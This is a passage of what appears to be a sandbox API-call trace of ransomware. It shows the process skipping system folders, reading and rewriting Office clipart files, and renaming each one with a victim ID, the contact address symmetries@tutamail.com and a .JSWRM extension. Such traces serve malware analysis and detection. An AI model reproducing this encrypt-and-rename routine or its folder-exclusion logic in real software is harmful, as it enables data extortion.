office\\root\\clipart\\pub60cor\\so00505_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00505_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00505_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0096.410] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0096.411] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0096.411] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0096.411] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10339e29, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10339e29, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10360091, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1724, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO00513_.WMF", cAlternateFileName="")) returned 1 [0096.411] lstrcmpiW (lpString1="SO00513_.WMF", lpString2=".") returned 1 [0096.411] lstrcmpiW (lpString1="SO00513_.WMF", lpString2="..") returned 1 [0096.411] lstrcmpiW (lpString1="SO00513_.WMF", lpString2="...") returned 1 [0096.411] lstrcmpiW (lpString1="SO00513_.WMF", lpString2="windows") returned -1 [0096.411] lstrcmpiW (lpString1="SO00513_.WMF", lpString2="recovery") returned 1 [0096.411] lstrcmpiW (lpString1="SO00513_.WMF", lpString2="perflogs") returned 1 [0096.411] lstrcmpiW (lpString1="SO00513_.WMF", lpString2="documents and settings") returned 1 [0096.411] lstrcmpiW (lpString1="SO00513_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0096.411] lstrcmpiW (lpString1="SO00513_.WMF", lpString2="system volume information") returned -1 [0096.411] lstrcmpiW (lpString1="SO00513_.WMF", lpString2="msocache") returned 1 [0096.411] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0096.411] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00513_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.411] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00513_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00513_.WMF", lpUsedDefaultChar=0x0) returned 12 [0096.411] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0096.411] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0096.411] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00513_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.411] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00513_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00513_.WMF", lpUsedDefaultChar=0x0) returned 12 [0096.411] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0096.411] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0096.411] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0096.411] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0096.411] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0096.411] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0096.411] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00513_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00513_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0096.414] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=5924) returned 1 [0096.414] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0096.414] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1720) returned 0x205850 [0096.414] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1720, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1720, lpOverlapped=0x0) returned 1 [0096.416] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0096.416] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1720, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1720, lpOverlapped=0x0) returned 1 [0096.417] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0096.417] CloseHandle (hObject=0x314) returned 1 [0096.417] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0096.417] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0096.417] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0096.417] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0096.417] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0096.417] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0096.417] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0096.417] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0096.417] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0096.417] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0096.417] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0096.417] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0096.417] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0096.417] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0096.417] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00513_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00513_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00513_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00513_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0096.418] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0096.418] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0096.418] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0096.418] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10339e29, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10339e29, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10339e29, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2602, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO00555_.WMF", cAlternateFileName="")) returned 1 [0096.418] lstrcmpiW (lpString1="SO00555_.WMF", lpString2=".") returned 1 [0096.418] lstrcmpiW (lpString1="SO00555_.WMF", lpString2="..") returned 1 [0096.418] lstrcmpiW (lpString1="SO00555_.WMF", lpString2="...") returned 1 [0096.418] lstrcmpiW (lpString1="SO00555_.WMF", lpString2="windows") returned -1 [0096.418] lstrcmpiW (lpString1="SO00555_.WMF", lpString2="recovery") returned 1 [0096.418] lstrcmpiW (lpString1="SO00555_.WMF", lpString2="perflogs") returned 1 [0096.418] lstrcmpiW (lpString1="SO00555_.WMF", lpString2="documents and settings") returned 1 [0096.418] lstrcmpiW (lpString1="SO00555_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0096.418] lstrcmpiW (lpString1="SO00555_.WMF", lpString2="system volume information") returned -1 [0096.418] lstrcmpiW (lpString1="SO00555_.WMF", lpString2="msocache") returned 1 [0096.418] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0096.418] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00555_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.418] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00555_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00555_.WMF", lpUsedDefaultChar=0x0) returned 12 [0096.419] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0096.419] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0096.419] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00555_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.419] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00555_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00555_.WMF", lpUsedDefaultChar=0x0) returned 12 [0096.419] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0096.419] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0096.419] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0096.419] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0096.419] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0096.419] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0096.419] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00555_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00555_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0096.419] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=9730) returned 1 [0096.419] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0096.419] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2600) returned 0x24d210 [0096.419] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x2600, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x2600, lpOverlapped=0x0) returned 1 [0096.421] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0096.421] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x2600, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x2600, lpOverlapped=0x0) returned 1 [0096.422] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0096.422] CloseHandle (hObject=0x314) returned 1 [0096.422] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0096.422] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0096.422] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0096.422] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0096.422] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0096.422] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0096.422] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0096.422] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2e8 [0096.422] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2e8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0096.422] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2e8 | out: hHeap=0x1e0000) returned 1 [0096.422] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0096.422] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0096.422] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0096.422] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0096.422] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00555_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00555_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00555_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00555_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0096.423] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0096.423] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0096.423] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0096.423] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10360091, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10360091, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10360091, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x6260, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO00603_.WMF", cAlternateFileName="")) returned 1 [0096.423] lstrcmpiW (lpString1="SO00603_.WMF", lpString2=".") returned 1 [0096.423] lstrcmpiW (lpString1="SO00603_.WMF", lpString2="..") returned 1 [0096.423] lstrcmpiW (lpString1="SO00603_.WMF", lpString2="...") returned 1 [0096.423] lstrcmpiW (lpString1="SO00603_.WMF", lpString2="windows") returned -1 [0096.423] lstrcmpiW (lpString1="SO00603_.WMF", lpString2="recovery") returned 1 [0096.423] lstrcmpiW (lpString1="SO00603_.WMF", lpString2="perflogs") returned 1 [0096.423] lstrcmpiW (lpString1="SO00603_.WMF", lpString2="documents and settings") returned 1 [0096.423] lstrcmpiW (lpString1="SO00603_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0096.423] lstrcmpiW (lpString1="SO00603_.WMF", lpString2="system volume information") returned -1 [0096.423] lstrcmpiW (lpString1="SO00603_.WMF", lpString2="msocache") returned 1 [0096.423] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0096.423] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00603_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.423] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00603_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00603_.WMF", lpUsedDefaultChar=0x0) returned 12 [0096.423] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0096.423] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0096.423] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00603_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.423] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00603_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00603_.WMF", lpUsedDefaultChar=0x0) returned 12 [0096.423] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0096.423] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0096.424] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0096.424] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0096.424] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0096.424] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0096.424] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00603_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00603_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0096.424] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=25184) returned 1 [0096.424] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0096.424] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x6260) returned 0x24d210 [0096.424] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x6260, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x6260, lpOverlapped=0x0) returned 1 [0096.427] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0096.427] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x6260, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x6260, lpOverlapped=0x0) returned 1 [0096.428] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0096.428] CloseHandle (hObject=0x314) returned 1 [0096.428] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0096.428] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0096.428] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0096.428] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0096.428] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0096.429] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0096.429] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0096.429] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0096.429] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0096.429] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0096.429] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0096.429] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0096.429] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0096.429] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0096.429] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00603_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00603_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00603_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00603_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0096.430] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0096.430] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0096.430] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0096.430] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10339e29, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10339e29, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10339e29, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x9c80, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO00610_.WMF", cAlternateFileName="")) returned 1 [0096.430] lstrcmpiW (lpString1="SO00610_.WMF", lpString2=".") returned 1 [0096.430] lstrcmpiW (lpString1="SO00610_.WMF", lpString2="..") returned 1 [0096.430] lstrcmpiW (lpString1="SO00610_.WMF", lpString2="...") returned 1 [0096.430] lstrcmpiW (lpString1="SO00610_.WMF", lpString2="windows") returned -1 [0096.430] lstrcmpiW (lpString1="SO00610_.WMF", lpString2="recovery") returned 1 [0096.430] lstrcmpiW (lpString1="SO00610_.WMF", lpString2="perflogs") returned 1 [0096.430] lstrcmpiW (lpString1="SO00610_.WMF", lpString2="documents and settings") returned 1 [0096.430] lstrcmpiW (lpString1="SO00610_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0096.430] lstrcmpiW (lpString1="SO00610_.WMF", lpString2="system volume information") returned -1 [0096.430] lstrcmpiW (lpString1="SO00610_.WMF", lpString2="msocache") returned 1 [0096.430] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0096.430] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, 